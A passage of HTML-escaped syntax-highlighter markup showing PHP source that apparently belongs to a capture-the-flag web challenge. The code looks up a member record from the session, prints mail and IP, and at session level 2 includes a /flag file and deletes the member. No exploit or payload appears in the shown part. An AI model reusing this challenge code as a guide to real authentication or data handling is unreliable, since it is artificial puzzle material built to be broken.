!important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-93&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;dbconn.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-94&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$ret&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;select&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-95&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;p&amp;gt;mail : {$ret['1']}&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;ip : {$ret['3']}&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-96&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lvl'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-97&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;echo&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;p&amp;gt;Flag : &amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-98&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;/flag&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-99&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;delete&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;member_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-100&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-101&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-102&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;logout&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: 